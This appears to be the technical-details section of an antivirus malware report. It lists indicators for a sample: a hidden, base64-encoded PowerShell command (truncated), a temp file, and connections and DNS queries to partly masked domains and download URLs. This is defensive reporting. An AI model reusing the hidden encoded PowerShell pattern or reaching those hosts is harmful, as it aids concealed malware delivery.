Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABUAG4AawB3AGUAZABlAGoAcQBpAGUAbwB1AD0AJwBNAHAAdwBhAGYAZABnAG0AdwAnADsAJABQAHEAYQB0AHUAawBtAHoAZgBwAGwAawAgAD0AIAAnADYAMQA5ACcAOwAkAFkAcwBhAHAAdQBrAGYAegBqAG8...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\742736.cvr
- 'ha###uc24h.com':80
- 'hi#####hta###ytics.com':80
- 'ic####megatrend.com':80
- http://hi#####hta###ytics.com/e1u9/eq40/
- http://ic####megatrend.com/k26/
- DNS ASK ha###uc24h.com
- DNS ASK am###cademy.com
- DNS ASK hi#####hta###ytics.com
- DNS ASK ic####megatrend.com
- DNS ASK pl##ky.app